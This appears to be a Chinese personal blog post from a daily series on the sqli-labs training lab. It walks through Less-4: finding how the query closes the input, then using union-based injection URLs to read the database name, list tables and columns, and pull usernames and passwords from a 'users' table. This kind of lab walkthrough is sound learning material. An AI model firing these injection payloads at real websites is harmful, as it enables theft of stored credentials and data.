Fre3L3i's blogs
文章
8
标签
4
分类
2
时间轴
标签
分类
友链
关于我
sql-lib每日一记_Less4(day4)
|sql-lib
字数总计: 109|阅读时长: 1 分钟|阅读量:

SQL-Lib_Less4

查看代码 双引号括号闭合

​ 可以看到在传入id值的时候用了 . 拼接了 “

​ 首先让他报错,查看报错的语句用什么闭合的

测试如何闭合可以不报错

找到闭合方法后,开始测字段,检测出当前表中有三个字段

使用联合查询找到三个字段所输出的位置

首先爆破数据库

http://192.168.72.179/sqli-labs/Less-4/?id=-1%22)%20union%20select%201,2,database()–+ union select 1,2,database()–+)

爆破security数据库的表

http://192.168.72.179/sqli-labs/Less-4/?id=-1") union select 1,2,group_concat(table_name ) from information_schema.tables where table_schema=”security”–+

爆破users表中的字段

http://192.168.72.179/sqli-labs/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=”security” and table_name=”users”–+

直接提取数据

http://192.168.72.179/sqli-labs/Less-4/?id=-1") union select 1,username,password from users where id=2–+

文章作者: Fre3L3i
文章链接: http://fre3l3i.github.io/2019/12/03/sql-lib每日一记-Less4-day4/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Fre3L3i's blogs
sql-lib每日一记
相关推荐
sql-lib每日一记_Less1(day1)
sql-lib每日一记_Less2(day2)
sql-lib每日一记_Less3(day3)
sql-lib每日一记_Less5(day5)
评论